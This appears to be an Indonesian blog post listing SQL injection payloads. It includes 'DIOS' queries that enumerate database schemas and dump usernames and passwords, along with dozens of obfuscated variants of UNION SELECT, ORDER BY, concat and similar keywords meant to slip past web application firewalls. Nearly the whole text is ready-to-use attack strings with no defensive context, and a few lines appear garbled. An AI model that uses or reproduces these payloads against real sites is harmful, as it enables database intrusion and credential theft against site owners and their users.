kumpulan bypass waff
Kumpulan Dios
BASIC DIOS 1 :
(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.schemata) where (0x00) in (@x:=concat(@x,0x3c62723e,schema_name))))x)
BASIC DIOS 2 :
concat(@c:=0x00,if((select count(*) from *information_schema.columns where table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c)
DIOS + WAF 1 :
concat%0b(@c:=0x00,if((select count() from /!50000information_schema*/.columns /!50000where/ table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat%0b(@c,0x3c62723e,/!50000table_name/,0x2e,/!50000column_name/)),0x00,0x00),@c)
DIOS + WAF 2 :
(/!12345sELecT/(@)from(/!12345sELecT/(@:=0x00),(/!12345sELecT/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/data/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
Dios 3
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Dump
(select(@x)from(select(@x:=0x00),(select(@x)from(as_user)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x)
Macam Macam Bypass Waff
[#] Order By [#]
/!ORDER/ BY 1
/!ORDER//BY/ 1
/!50000ORDER/ BY 1
/!50000ORDER BY/ 1
/*_/ORDER/_/ /_/BY/_*/ 1
/*//_/ORDER/_/// ///_/BY/_/ /*/ 1
/*/OR/*/DER BY 1
ORDER BY 1
ORDER BY 1
%0AORDER%0A %0ABY%0A 1
ORDER BY (1)--
[#] Bypass Concat() [#]
/!concat/()
/!50000concat/()
/*//concat/*/()
/*/con//cat/*/()
concat/*_*/()
/*_/concat/_*/()
concat()
concat()
concat()
%0Aconcat()
concat%0A()
%0Aconcat%0A()
[#] Bypass Group_concat() [#]
/!Group_concat/()
/!50000group_concat/()
/*//group_concat/*/()
/*/Gro//up_con//cat/*/()
group_concat/*_*/()
/*_/group_concat/_*/()
group_concat()
group_concat()
group_concat()
%0Agroup_concat()
group_concat%0A()
%0Agroup_concat%0A()
[#] Bypass version() [#]
/!version/()
/!50000version/()
/*//version/*/()
/*/ver//sion/*/()
version/*_*/()
/*_/version/_*/()
version()
version()
version()
%0Aversion()
version%0A()
%0Aversion%0A()
[#]Bypass database()[#]
/!database/()
/!50000database/()
/*//database/*/()
/*/data//base/*/()
database/*_*/()
/*_/database/_*/()
database()
database()
database()
%0Adatabase()
database%0A()
%0Adatabase%0A()
[#]Bypass user()[#]
/!user/()
/!50000user/()
/*//user/*/()
/*/us//er/*/()
user/*_*/()
/*_/user/_*/()
user()
user()
user()
%0Auser()
user%0A()
%0Auser%0A()
[#]Bypass from [#]
/!from/
/!50000from/
from
from
%0Afrom
from%0A
%0Afrom%0A
%0ATWA%0Afrom%0ATWA%0A
[#]Bypass information_schema.columns [#]
/!information_schema.columns/
/!information_schema/.columns
/!50000information_schema/.columns
/!50000information_schema.columns/
/*_/information_schema/_*/.columns
/*/information_schema/*/.columns
/*/information_sch//ema/*/.columns
information_sch/**/ema.columns
information_schema.columns
%0Ainformation_schema.columns
[#]Bypass union select [#]
/!%55NiOn/ /!%53eLEct/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/*//!12345UNION SELECT*//**/
/*//!50000UNION SELECT*//**/
/*/UNION///!50000SELECT*//**/
/!50000UniON SeLeCt/
union /!50000%53elect/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/!%55NiOn/ /!%53eLEct/
/!u%6eion/ /!se%6cect/
+un/*/ion+se/*/lect
uni%0bon+se%0blect
%2f*%2funion%2f*%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/--/union/--/select/--/
union (/!/*/ SeleCT */ 1,2,3)
/!union/+/!select/
union+/!select/
/*/union//select/*/
/*/uNIon//sEleCt/*/
/*//!union*//*//!select*//**/
/!uNIOn/ /!SelECt/
+union+distinct+select+
+union+distinctROW+select+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/&test=1/SELECT/&pwn=2/
un?+un/*/ion+se/*/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f*%2funion%2f%2fselect%2f*%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/!UnIoN/SeLecT+
Komentar
Posting Komentar